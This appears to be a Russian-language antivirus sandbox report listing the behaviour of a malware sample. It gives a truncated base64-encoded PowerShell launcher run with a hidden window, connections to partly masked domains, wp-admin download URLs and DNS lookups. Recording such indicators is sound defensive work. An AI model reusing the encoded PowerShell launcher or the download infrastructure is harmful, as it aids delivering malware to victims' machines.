Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAHoAMgBzAGMAXwBxAD0AKAAoACcAWABiADAAJwArACcAYgBoACcAKQArACcAMAAzACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAVQBzAGUAUgBwAFIATwBGAGkAbABFAFwAWQBxADEARgAwAD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\717932.cvr
- 'al####ektronik.com':80
- 'al####ektronik.com':443
- 'as####pirulina.com':80
- 'ba###tstone.com':80
- 'as##sa.com':443
- http://al####ektronik.com/wp-admin/A/
- http://as####pirulina.com/wp-admin/6hU/
- 'al####ektronik.com':443
- 'as##sa.com':443
- DNS ASK al####ektronik.com
- DNS ASK as####pirulina.com
- DNS ASK ac####rbeyal.com
- DNS ASK so####rucken.com
- DNS ASK ba###tstone.com
- DNS ASK ma###.#eoper.beget.tech
- DNS ASK as##sa.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAHoAMgBzAGMAXwBxAD0AKAAoACcAWABiADAAJwArACcAYgBoACcAKQArACcAMAAzACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAVQBzAGUAUgBwAFIATwBGAGkAbABFAFwAWQBxADEARgAwAD... (со скрытым окном)